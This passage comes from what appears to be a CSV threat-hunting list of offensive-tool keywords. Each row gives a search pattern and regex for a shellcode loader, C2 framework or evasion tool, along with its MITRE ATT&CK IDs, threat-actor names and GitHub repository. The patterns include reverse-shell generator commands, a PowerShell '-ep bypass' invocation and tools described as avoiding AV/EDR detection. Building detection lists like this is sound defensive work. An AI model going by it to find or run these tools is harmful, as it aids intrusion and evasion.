currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","401","48","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*shellcode1 += b*",".{0,1000}shellcode1\s\+\=\sb.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*shellcode20.exe*",".{0,1000}shellcode20\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*shellcode30.exe*",".{0,1000}shellcode30\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*shellcode35.exe*",".{0,1000}shellcode35\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*shellcode40.exe*",".{0,1000}shellcode40\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z" "*shellcodeCrypter-bin.py*",".{0,1000}shellcodeCrypter\-bin\.py.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" 
"*shellcodeCrypter-msfvenom.py*",".{0,1000}shellcodeCrypter\-msfvenom\.py.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*Shellcode-Download_CreateThread_Execution*",".{0,1000}Shellcode\-Download_CreateThread_Execution.{0,1000}","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid static detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","243","51","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z" "*Shellcode-Downloader-CreateThread-Execution*",".{0,1000}Shellcode\-Downloader\-CreateThread\-Execution.{0,1000}","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid static detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","243","51","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z" "*shellcodeEncryptDecrypt*",".{0,1000}shellcodeEncryptDecrypt.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX 
and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*shellcode-exec.ps1*",".{0,1000}shellcode\-exec\.ps1.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*shellcodeexec.x32*",".{0,1000}shellcodeexec\.x32.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "*shellcodeexec.x64*",".{0,1000}shellcodeexec\.x64.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" 
"*ShellcodeFluctuation.*",".{0,1000}ShellcodeFluctuation\..{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*ShellcodeFluctuation64*",".{0,1000}ShellcodeFluctuation64.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 
- T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*ShellcodeFluctuation86*",".{0,1000}ShellcodeFluctuation86.{0,1000}","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","845","147","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*Shellcode-Hide-main*",".{0,1000}Shellcode\-Hide\-main.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" 
"*shellcodeInjection.json*",".{0,1000}shellcodeInjection\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Shellcode-Loader-master*",".{0,1000}Shellcode\-Loader\-master.{0,1000}","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","179","37","2024-04-08T20:20:59Z","2021-08-08T08:53:03Z" "*ShellcodeRDI.*",".{0,1000}ShellcodeRDI\..{0,1000}","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1997","453","2023-11-15T10:53:00Z","2017-07-28T19:30:53Z" "*ShellcodeRDI.py*",".{0,1000}ShellcodeRDI\.py.{0,1000}","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","256","50","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z" "*ShellcodeRDI.py*",".{0,1000}ShellcodeRDI\.py.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*shellcode-runner.py*",".{0,1000}shellcode\-runner\.py.{0,1000}","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*ShellcodeTemplate.x64.bin*",".{0,1000}ShellcodeTemplate\.x64\.bin.{0,1000}","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","1","17","3","2023-08-23T13:50:27Z","2023-12-01T12:47:43Z" "*shellcodetester *",".{0,1000}shellcodetester\s.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","0","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*ShellCodeTester.csproj*",".{0,1000}ShellCodeTester\.csproj.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*shellcodetester.exe*",".{0,1000}shellcodetester\.exe.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation 
tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*shellcodetester.git*",".{0,1000}shellcodetester\.git.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*shellcodetester.sh*",".{0,1000}shellcodetester\.sh.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*ShellCodeTester.sln*",".{0,1000}ShellCodeTester\.sln.{0,1000}","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","81","29","2023-11-01T23:29:28Z","2019-06-11T04:39:58Z" "*shellerator --reverse-shell --lhost * --lport * --type *",".{0,1000}shellerator\s\-\-reverse\-shell\s\-\-lhost\s.{0,1000}\s\-\-lport\s.{0,1000}\s\-\-type\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*ShellGen powershell.exe -ep bypass ",".{0,1000}ShellGen\spowershell\.exe\s\-ep\sbypass\s","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation 
framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*ShellGhost.dll",".{0,1000}ShellGhost\.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost.exe*",".{0,1000}ShellGhost\.exe.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost.sln*",".{0,1000}ShellGhost\.sln.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost.vcxproj*",".{0,1000}ShellGhost\.vcxproj.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost_mapping.py*",".{0,1000}ShellGhost_mapping\.py.{0,1000}","offensive_tool_keyword","ShellGhost","A 
memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellGhost-master.zip*",".{0,1000}ShellGhost\-master\.zip.{0,1000}","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","10","1025","127","2023-10-16T06:40:24Z","2023-07-01T16:56:58Z" "*ShellProfilePersistence.json*",".{0,1000}ShellProfilePersistence\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*shellster/LDAPPER*",".{0,1000}shellster\/LDAPPER.{0,1000}","offensive_tool_keyword","LDAPPER","LDAP Querying without the Suck","T1087 - T1069 - T1018","TA0007","N/A","N/A","Discovery","https://github.com/shellster/LDAPPER","1","1","N/A","7","1","87","9","2022-09-30T23:28:28Z","2020-06-17T16:53:35Z" "*shellter.exe*",".{0,1000}shellter\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*shepardsbind_recv.py*",".{0,1000}shepardsbind_recv\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode 
generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*shepbind_serv.exe*",".{0,1000}shepbind_serv\.exe.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Sherlock.ps1*",".{0,1000}Sherlock\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*sherlock.ps1*",".{0,1000}sherlock\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1710","584","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z" "*Sherlock_Vulns.txt*",".{0,1000}Sherlock_Vulns\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" 
"*Shhhavoc.py *",".{0,1000}Shhhavoc\.py\s.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*Shhhloader.py*",".{0,1000}Shhhloader\.py.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/icyguider/Shhhloader","1","1","N/A","9","10","1048","172","2024-04-26T14:24:52Z","2021-09-28T16:52:24Z" "*Shhhloader-main\*",".{0,1000}Shhhloader\-main\\.{0,1000}","offensive_tool_keyword","Shhhloader","shellcode loader that compiles a C++ stub to bypass AV/EDR","T1027 - T1055 - T1140 - T1218","TA0005 - TA0002","N/A","N/A","Defense 